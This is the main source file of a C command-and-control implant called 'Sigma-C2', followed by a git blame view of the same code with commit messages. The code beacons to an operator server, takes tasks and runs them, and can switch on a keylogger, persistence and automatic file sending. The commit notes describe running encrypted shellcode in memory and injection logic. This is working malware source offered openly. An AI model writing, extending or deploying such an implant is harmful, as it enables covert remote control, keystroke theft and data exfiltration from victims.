Sigma-C2/agent/agent.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "config.h"
#include "commands.c"
#include "files.c"
#include "info.c"
#include "modules.c"
#include "navigation.c"
#include "processes.c"
#include "transport.c"

// Buffer to store startup tasks result
char startup_result[1024];

LARGE_INTEGER start, end, freq;

#if TESTING_BUILD
    char agentID[] = "TestAgent";
    char* serverDomains[] = {"192.168.1.4"};
    int startupDelay = 0;
    
    #if USE_SCHANNEL
        unsigned short int SERVER_PORT = 8443;
    #elif USE_WOLFSSL
        unsigned short int SERVER_PORT = 8443;
    #else 
        unsigned short int SERVER_PORT = 8888;
    #endif

#else
    char agentID[] = "PLACEHOLDER_AGENT_ID";
    char* serverDomains[] = {"PLACEHOLDER_SERVER_ADDR"};
    unsigned short int SERVER_PORT = 54321;
    int startupDelay = 1298;
#endif

unsigned short int domainCount = sizeof(serverDomains) / sizeof(serverDomains[0]);

int reconnectDelay = 5678;
int keylogDelay = 20000;
int filesDelay = 17000;
short int firstConnection = 1;

#if ENABLE_KEYLOGGER
    HANDLE hKeylogThread = NULL;
    HANDLE hKeylogTimerThread = NULL;
#endif

#if AUTO_FILES
    HANDLE hFilesTimerThread = NULL;
#endif

// Receive response after heartbeat
void ReceiveResponse(Transport* transport) {
    char buffer[512];
    int bytesReceived = transport->recv(transport->handle, buffer, sizeof(buffer) - 1);
    if (bytesReceived <= 0) {
        fprintf(stderr, "Error receiving message from server\n");
        return;
    }
    buffer[bytesReceived] = '\0';
    printf("Message from server: %s\n", buffer);

    // Check if there is a task to do
    if (strncmp(buffer, "TASK", 4) == 0) {
        printf("Received task from server\n");
        char* taskID = strtok(buffer + 4, "~");
        char* taskType = strtok(NULL, "~");
        char* taskArgs = strtok(NULL, "");
        printf("Task ID: %s\n", taskID);
        printf("Task type: %s\n", taskType);
        printf("Task args: %s\n", taskArgs);
        if (taskType) {
            HandleTask(transport, taskID, taskType, taskArgs);
        } else {
            SendTaskResult(transport, "", "Invalid task format\n");
        }
    } else if (strcmp(buffer, "ACK") == 0) {
        printf("Message acknowledged by server\n");
    }
}

// Check-in with server
void SendHeartbeat(Transport* transport) {
    char heartbeat_message[32];
    snprintf(heartbeat_message, sizeof(heartbeat_message), "%s~HEARTBEAT", agentID);

    int sent = transport->send(transport->handle, heartbeat_message, strlen(heartbeat_message));
    if (sent <= 0) {
        fprintf(stderr, "Error: Failed to send heartbeat, returned %d\n", sent);
        CleanupTransport(transport);
        return;
    }
    printf("Heartbeat sent successfully, bytes sent: %d\n", sent);
    ReceiveResponse(transport);
}

void start_timer() {
    QueryPerformanceFrequency(&freq);
    QueryPerformanceCounter(&start);
}

void stop_timer() {
    QueryPerformanceCounter(&end);
    double elapsed = (double)(end.QuadPart - start.QuadPart) / freq.QuadPart;
    printf("\nElapsed time: %.6f seconds\n", elapsed);
}

int main() {
    if (firstConnection) {
        printf("Initial startup delay for %d milliseconds...\n", startupDelay);
        Sleep(startupDelay);
    }

    #if ENABLE_PERSISTENCE && AUTO_PERSISTENCE
        CheckPersistence(startup_result);
    #endif

    #if ENABLE_KEYLOGGER && AUTO_KEYLOGGER
        InitKeylogger(startup_result);
    #endif

    #if AUTO_FILES
        InitFileSender();
    #endif

    // Testing
    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        fprintf(stderr, "Error: WSAStartup failed, error %d\n", WSAGetLastError());
        return 0;
    }

    // Main loop for communication with server
    while (1) {
        // Testing
        start_timer();

        Transport* transport = InitTransport(GetNextDomain(), SERVER_PORT);
        if (!transport) {
            printf("Connection failed. Retrying in %d seconds...\n", reconnectDelay / 1000);
            Sleep(reconnectDelay);
            continue;
        }
        printf("Connected to server\n");

        if (firstConnection) {
            SendSysInfo(startup_result);
            SendTaskResult(transport, "SYSINFO", startup_result);
            firstConnection = 0;
        } else {
            printf("Trying to send heartbeat\n");
            SendHeartbeat(transport);
        }
        CleanupTransport(transport);

        printf("Disconnecting from server\n");

        // Testing
        stop_timer();

        Sleep(reconnectDelay);
    }
    return 0;
}
Added missing header files and new compiler flags. 2025-04-23 12:37:25 +02:00			`#include <stdio.h>`
			`#include <stdlib.h>`
			`#include <string.h>`

Payload became more modular. Now you can choose whether to include keylogger and persistence functionality and whether to launch it on start-up or not. 2025-03-19 15:23:45 +01:00			`#include "config.h"`
Preparing for unity build. Got tired of header files and includes. 2025-04-25 16:21:54 +02:00			`#include "commands.c"`
			`#include "files.c"`
			`#include "info.c"`
			`#include "modules.c"`
			`#include "navigation.c"`
			`#include "processes.c"`
			`#include "transport.c"`

Added task id logic: now agent reports task result with task id after "TASKRESULT" message part, which helps identify task and operator who issued it. Added size optimization flags to payload generator. Corrected source files list in payload generator. Corrected macros for transport selection. 2025-05-24 14:00:58 +02:00			`// Buffer to store startup tasks result`
			`char startup_result[1024];`
Refactored sysinfo command and some bug fixed 2025-04-27 08:49:59 +02:00
Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00			`LARGE_INTEGER start, end, freq;`

Added testing build flag and optimization build to makefile. 2025-04-09 19:57:36 +02:00			`#if TESTING_BUILD`
File structure change. TaskID fix in task result sending logic. PID is now formated and sent correctly. 2025-07-12 22:36:15 +02:00			`char agentID[] = "TestAgent";`
Added testing build flag and optimization build to makefile. 2025-04-09 19:57:36 +02:00			`char* serverDomains[] = {"192.168.1.4"};`
			`int startupDelay = 0;`
Windows Schannel transport and prototype of https listener 2025-05-03 12:32:19 +02:00
			`#if USE_SCHANNEL`
			`unsigned short int SERVER_PORT = 8443;`
Added task id logic: now agent reports task result with task id after "TASKRESULT" message part, which helps identify task and operator who issued it. Added size optimization flags to payload generator. Corrected source files list in payload generator. Corrected macros for transport selection. 2025-05-24 14:00:58 +02:00			`#elif USE_WOLFSSL`
Windows Schannel transport and prototype of https listener 2025-05-03 12:32:19 +02:00			`unsigned short int SERVER_PORT = 8443;`
			`#else`
			`unsigned short int SERVER_PORT = 8888;`
			`#endif`

Added testing build flag and optimization build to makefile. 2025-04-09 19:57:36 +02:00			`#else`
			`char agentID[] = "PLACEHOLDER_AGENT_ID";`
			`char* serverDomains[] = {"PLACEHOLDER_SERVER_ADDR"};`
			`unsigned short int SERVER_PORT = 54321;`
			`int startupDelay = 1298;`
			`#endif`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00
			`unsigned short int domainCount = sizeof(serverDomains) / sizeof(serverDomains[0]);`
Initialised a repository 2025-02-06 14:42:06 +01:00
Added possibility to set startup delay during payload generation 2025-03-23 11:47:19 +01:00			`int reconnectDelay = 5678;`
Added task reporting after modules execution. Got rid of unnecessary static and const statements. I think nobody is going ever to read this code. Minor adjustments for readability and logging. 2025-04-08 14:42:11 +02:00			`int keylogDelay = 20000;`
Added flag to specify interval between connection during compilation 2025-03-19 16:11:27 +01:00			`int filesDelay = 17000;`
Added possibility to set startup delay during payload generation 2025-03-23 11:47:19 +01:00			`short int firstConnection = 1;`
Initialised a repository 2025-02-06 14:42:06 +01:00
Added task reporting after modules execution. Got rid of unnecessary static and const statements. I think nobody is going ever to read this code. Minor adjustments for readability and logging. 2025-04-08 14:42:11 +02:00			`#if ENABLE_KEYLOGGER`
			`HANDLE hKeylogThread = NULL;`
			`HANDLE hKeylogTimerThread = NULL;`
			`#endif`

			`#if AUTO_FILES`
			`HANDLE hFilesTimerThread = NULL;`
			`#endif`
Initialised a repository 2025-02-06 14:42:06 +01:00
Moved all command-related stuff to separate file commands.c/h 2025-04-07 14:00:24 +02:00			`// Receive response after heartbeat`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`void ReceiveResponse(Transport* transport) {`
2025-04-26 21:11:19 +02:00			`char buffer[512];`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`int bytesReceived = transport->recv(transport->handle, buffer, sizeof(buffer) - 1);`
Initialised a repository 2025-02-06 14:42:06 +01:00			`if (bytesReceived <= 0) {`
			`fprintf(stderr, "Error receiving message from server\n");`
			`return;`
			`}`
			`buffer[bytesReceived] = '\0';`
			`printf("Message from server: %s\n", buffer);`

2025-04-26 21:11:19 +02:00			`// Check if there is a task to do`
Moved all command-related stuff to separate file commands.c/h 2025-04-07 14:00:24 +02:00			`if (strncmp(buffer, "TASK", 4) == 0) {`
Initialised a repository 2025-02-06 14:42:06 +01:00			`printf("Received task from server\n");`
2025-04-26 21:11:19 +02:00			`char* taskID = strtok(buffer + 4, "~");`
			`char* taskType = strtok(NULL, "~");`
Initialised a repository 2025-02-06 14:42:06 +01:00			`char* taskArgs = strtok(NULL, "");`
2025-04-26 21:11:19 +02:00			`printf("Task ID: %s\n", taskID);`
Initialised a repository 2025-02-06 14:42:06 +01:00			`printf("Task type: %s\n", taskType);`
			`printf("Task args: %s\n", taskArgs);`
			`if (taskType) {`
2025-04-26 21:11:19 +02:00			`HandleTask(transport, taskID, taskType, taskArgs);`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`} else {`
2025-04-26 21:11:19 +02:00			`SendTaskResult(transport, "", "Invalid task format\n");`
Initialised a repository 2025-02-06 14:42:06 +01:00			`}`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`} else if (strcmp(buffer, "ACK") == 0) {`
Initialised a repository 2025-02-06 14:42:06 +01:00			`printf("Message acknowledged by server\n");`
			`}`
			`}`

Moved all command-related stuff to separate file commands.c/h 2025-04-07 14:00:24 +02:00			`// Check-in with server`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`void SendHeartbeat(Transport* transport) {`
Added new beacon to repo. Fixed injection logic for new beacon. 2025-04-27 09:53:28 +02:00			`char heartbeat_message[32];`
			`snprintf(heartbeat_message, sizeof(heartbeat_message), "%s~HEARTBEAT", agentID);`
Initialised a repository 2025-02-06 14:42:06 +01:00
Added new beacon to repo. Fixed injection logic for new beacon. 2025-04-27 09:53:28 +02:00			`int sent = transport->send(transport->handle, heartbeat_message, strlen(heartbeat_message));`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`if (sent <= 0) {`
			`fprintf(stderr, "Error: Failed to send heartbeat, returned %d\n", sent);`
			`CleanupTransport(transport);`
			`return;`
Initialised a repository 2025-02-06 14:42:06 +01:00			`}`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`printf("Heartbeat sent successfully, bytes sent: %d\n", sent);`
			`ReceiveResponse(transport);`
Initialised a repository 2025-02-06 14:42:06 +01:00			`}`

Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00			`void start_timer() {`
			`QueryPerformanceFrequency(&freq);`
			`QueryPerformanceCounter(&start);`
			`}`

			`void stop_timer() {`
			`QueryPerformanceCounter(&end);`
			`double elapsed = (double)(end.QuadPart - start.QuadPart) / freq.QuadPart;`
Server now sends encrypted shellcode and agent decrypts it in-memory before executions. 2025-04-16 14:48:10 +02:00			`printf("\nElapsed time: %.6f seconds\n", elapsed);`
Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00			`}`

Moved all command-related stuff to separate file commands.c/h 2025-04-07 14:00:24 +02:00			`int main() {`
			`if (firstConnection) {`
			`printf("Initial startup delay for %d milliseconds...\n", startupDelay);`
			`Sleep(startupDelay);`
			`}`

Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`#if ENABLE_PERSISTENCE && AUTO_PERSISTENCE`
Added task id logic: now agent reports task result with task id after "TASKRESULT" message part, which helps identify task and operator who issued it. Added size optimization flags to payload generator. Corrected source files list in payload generator. Corrected macros for transport selection. 2025-05-24 14:00:58 +02:00			`CheckPersistence(startup_result);`
Initialised a repository 2025-02-06 14:42:06 +01:00			`#endif`

Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`#if ENABLE_KEYLOGGER && AUTO_KEYLOGGER`
Added task id logic: now agent reports task result with task id after "TASKRESULT" message part, which helps identify task and operator who issued it. Added size optimization flags to payload generator. Corrected source files list in payload generator. Corrected macros for transport selection. 2025-05-24 14:00:58 +02:00			`InitKeylogger(startup_result);`
Initialised a repository 2025-02-06 14:42:06 +01:00			`#endif`

+ You can now change context and directly interact with agents by typing "interact <agent id>" and sending commands directly. + But uou can still issue command without switching to agent's context, just by typing <agent id> <command> <args> + Some minor refinements, like output beautify and cleaning 2025-04-06 09:36:31 +02:00			`#if AUTO_FILES`
Moved all command-related stuff to separate file commands.c/h 2025-04-07 14:00:24 +02:00			`InitFileSender();`
+ You can now change context and directly interact with agents by typing "interact <agent id>" and sending commands directly. + But uou can still issue command without switching to agent's context, just by typing <agent id> <command> <args> + Some minor refinements, like output beautify and cleaning 2025-04-06 09:36:31 +02:00			`#endif`
Initialised a repository 2025-02-06 14:42:06 +01:00
Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00			`// Testing`
			`WSADATA wsaData;`
			`if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {`
			`fprintf(stderr, "Error: WSAStartup failed, error %d\n", WSAGetLastError());`
Added missing header files and new compiler flags. 2025-04-23 12:37:25 +02:00			`return 0;`
Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00			`}`

Moved all command-related stuff to separate file commands.c/h 2025-04-07 14:00:24 +02:00			`// Main loop for communication with server`
Initialised a repository 2025-02-06 14:42:06 +01:00			`while (1) {`
Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00			`// Testing`
			`start_timer();`

Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`Transport* transport = InitTransport(GetNextDomain(), SERVER_PORT);`
			`if (!transport) {`
			`printf("Connection failed. Retrying in %d seconds...\n", reconnectDelay / 1000);`
Initialised a repository 2025-02-06 14:42:06 +01:00			`Sleep(reconnectDelay);`
			`continue;`
			`}`
			`printf("Connected to server\n");`

			`if (firstConnection) {`
Added task id logic: now agent reports task result with task id after "TASKRESULT" message part, which helps identify task and operator who issued it. Added size optimization flags to payload generator. Corrected source files list in payload generator. Corrected macros for transport selection. 2025-05-24 14:00:58 +02:00			`SendSysInfo(startup_result);`
			`SendTaskResult(transport, "SYSINFO", startup_result);`
Initialised a repository 2025-02-06 14:42:06 +01:00			`firstConnection = 0;`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`} else {`
Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00			`printf("Trying to send heartbeat\n");`
Added full support for TCP communication. Agent now can be generated with TCP transport by selecting TCP listener during generation. Such executable will not include any SSL code and libraries. Size of agent.exe with TCP transport is ~270kb, agent.exe with SSL transport is ~800kb 2025-04-06 20:48:05 +02:00			`SendHeartbeat(transport);`
Initialised a repository 2025-02-06 14:42:06 +01:00			`}`
Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00			`CleanupTransport(transport);`
Initialised a repository 2025-02-06 14:42:06 +01:00
			`printf("Disconnecting from server\n");`
Little enchancement for proxy server and some performance testing. 2025-04-15 22:16:39 +02:00
			`// Testing`
			`stop_timer();`

Initialised a repository 2025-02-06 14:42:06 +01:00			`Sleep(reconnectDelay);`
			`}`
			`return 0;`
			`}`